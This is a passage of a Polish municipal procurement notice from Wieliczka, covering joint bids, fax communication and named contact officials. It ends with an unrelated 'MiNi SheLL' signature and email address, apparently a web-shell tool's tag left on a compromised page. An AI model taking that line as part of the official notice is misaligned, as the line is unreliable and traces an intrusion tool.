10.  W przypadku składania oferty wspólnej przez kilku wykonawców, każdy ze wspólników musi złożyć dokumenty wymienione w punkcie III.4.2., oraz listę/informację o której mowa w pkt III.4.3 a jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej dokumenty wymienione w pkt III.4.3.1. Pozostałe dokumenty będą traktowane wspólnie. Wspólnicy ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia, określoną w art. 366 Kodeksu cywilnego. Do oferty należy załączyć pełnomocnictwo w oryginale lub w kopii potwierdzonej za zgodność z oryginałem notarialnie do reprezentowania wykonawców wspólnie występujących w postępowaniu. 

11. Wszystkie oświadczenia, wnioski, zawiadomienia oraz informacje przekazywane będą w formie pisemnej. Dopuszcza się porozumiewanie za pomocą faksu. Strona, która otrzymuje dokumenty lub informacje faksem, zobowiązana jest na żądanie strony przekazującej dokument lub informację do niezwłocznego potwierdzenia ich otrzymania. Numer faksu do korespondencji Wykonawców z Zamawiającym (12) 278-68-60. Osobą upoważnioną do kontaktowania się z wykonawcami jest: Dorota Męka, Adam Konieczny, Wydział Zamówień Publicznych Urzędu Miasta i Gminy w Wieliczce, 32-020 Wieliczka, ul. Sienkiewicza 2 tel. (012) 263-43-31..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com